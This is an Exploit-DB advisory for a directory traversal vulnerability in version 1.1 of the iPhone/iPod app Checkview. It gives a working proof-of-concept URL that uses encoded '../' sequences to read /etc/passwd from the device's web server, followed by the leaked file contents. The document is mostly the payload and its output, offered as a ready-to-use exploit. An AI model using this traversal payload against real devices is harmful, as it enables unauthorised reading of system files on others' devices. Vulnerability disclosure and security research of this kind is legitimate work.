iOS Checkview 1.1 - Directory Traversal

EDB-ID:

16972

CVE:

N/A


Author:

kim@story

Type:

remote


Platform:

iOS

Date:

2011-03-14


# Exploit Title: checkview(Ã¥ºä) v1.1 for iPhone / iPod touch, Directory Traversal
# Date: 03/14/2011
# Author: kim@story
# E-Mail : kimastory [at] gmail [dot] com
# Twitter : http://twitter.com/kimastory
# Software Link: http://itunes.apple.com/En/app/id381116321#
# Version: 1.1
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware  

# There is directory traversal vulnerability in the checkview(Ã¥ºä).  
# Exploit Testing


http://192.168.0.18:8888/..%2F..%2F..%2F..%2F..%2F/etc/passwd


#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false